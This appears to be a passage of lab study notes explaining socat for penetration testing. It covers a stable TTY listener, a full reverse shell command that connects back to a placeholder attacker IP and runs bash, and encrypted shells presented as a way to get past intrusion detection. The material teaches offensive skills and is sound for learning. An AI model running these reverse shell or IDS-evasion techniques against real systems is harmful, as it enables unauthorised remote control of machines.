
Socat is similar to netcat in some ways, but fundamentally different in many others. The easiest way to think about socat is as a connector between two points. In the interests of this room, `this will essentially be a listening port and the keyboard`, however, it could also be a listening port and a file, or indeed, two listening ports. All socat does is provide a link between two points -- much like the portal gun from the Portal games!





Now let's take a look at one of the more powerful uses for Socat: a fully stable Linux tty reverse shell. This will only work when the target is Linux, but is _significantly_ more stable. As mentioned earlier, socat is an incredibly versatile tool; however, the following technique is perhaps one of its most useful applications. Here is the new listener syntax:  

``socat TCP-L:<port> FILE:`tty`,raw,echo=0``  

Let's break this command down into its two parts. As usual, we're connecting two points together. In this case those points are a listening port, and a file. Specifically, we are passing in the current TTY as a file and setting the echo to be zero. This is approximately equivalent to using the Ctrl + Z, `stty raw -echo; fg` trick with a netcat shell -- with the added bonus of being immediately stable and hooking into a full tty.






The special command is as follows:

`socat TCP:<attacker-ip>:<attacker-port> EXEC:"bash -li",pty,stderr,sigint,setsid,sane`  

This is a handful, so let's break it down.

The first part is easy -- we're linking up with the listener running on our own machine. The second part of the command creates an interactive bash session with  `EXEC:"bash -li"`. We're also passing the arguments: pty, stderr, sigint, setsid and sane:

- **pty**, allocates a pseudoterminal on the target -- part of the stabilisation process
- **stderr**, makes sure that any error messages get shown in the shell (often a problem with non-interactive shells)  
- **sigint**, passes any Ctrl + C commands through into the sub-process, allowing us to kill commands inside the shell
- **setsid**, creates the process in a new session
- **sane**, stabilises the terminal, attempting to "normalise" it.



### Socat Encrypted Shells

>[! bug] IDS Bypass
>One of the many great things about socat is that it's capable of creating encrypted shells -- both bind and reverse. Why would we want to do this? Encrypted shells cannot be spied on unless you have the decryption key, and are often able to bypass an IDS as a result.


